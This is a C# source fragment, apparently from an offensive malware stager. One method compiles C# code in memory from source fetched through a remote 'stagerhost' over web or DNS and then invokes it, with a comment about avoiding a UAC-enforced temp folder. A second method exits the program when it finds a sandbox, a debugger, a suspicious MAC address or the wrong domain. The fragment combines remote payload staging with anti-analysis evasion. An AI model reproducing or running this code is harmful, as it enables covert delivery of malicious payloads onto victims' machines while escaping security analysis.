private void Shoot(string[] refs, string EntryPoint, string Method, bool technique, string stagerhost) { CheckPlease cp = new CheckPlease(); Dictionary <string, string> compilerInfo = new Dictionary <string, string>(); compilerInfo.Add("CompilerVersion", "v3.5"); CSharpCodeProvider provider = new CSharpCodeProvider(compilerInfo); CompilerParameters parameters = new CompilerParameters(); foreach (string r in refs) { parameters.ReferencedAssemblies.Add(r); } parameters.GenerateExecutable = false; parameters.GenerateInMemory = true; parameters.CompilerOptions = "/unsafe /platform:x86"; // Try and enforce the local appdata temp folder - .cs file written here so need to avoid c:\windows\temp for UAC enforced String tmp = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Temp"); parameters.TempFiles = new TempFileCollection(tmp, false); string code; // true = stage via web // false = stage via dns if (technique) { code = AimWeb(stagerhost); } else { code = AimDNS(stagerhost); } CompilerResults results = provider.CompileAssemblyFromSource(parameters, code); if (results.Errors.HasErrors) { StringBuilder sb = new StringBuilder(); foreach (CompilerError error in results.Errors) { sb.AppendLine(String.Format("Error ({0}): {1}", error.ErrorNumber, error.ErrorText)); } throw new InvalidOperationException(sb.ToString()); } Assembly assembly = results.CompiledAssembly; Type program = assembly.GetType(EntryPoint); MethodInfo main = program.GetMethod(Method); main.Invoke(null, null); }
public void velma(int check, string arg) { CheckPlease cp = new CheckPlease(); switch (check) { case 0: if (!cp.isDomain(arg)) { Environment.Exit(1); } break; case 1: if (!cp.isDomainJoined()) { Environment.Exit(1); } break; case 2: if (cp.containsSandboxArtifacts()) { Environment.Exit(1); } break; case 3: if (cp.isBadMac()) { Environment.Exit(1); } break; case 4: if (cp.isDebugged()) { Environment.Exit(1); } break; } }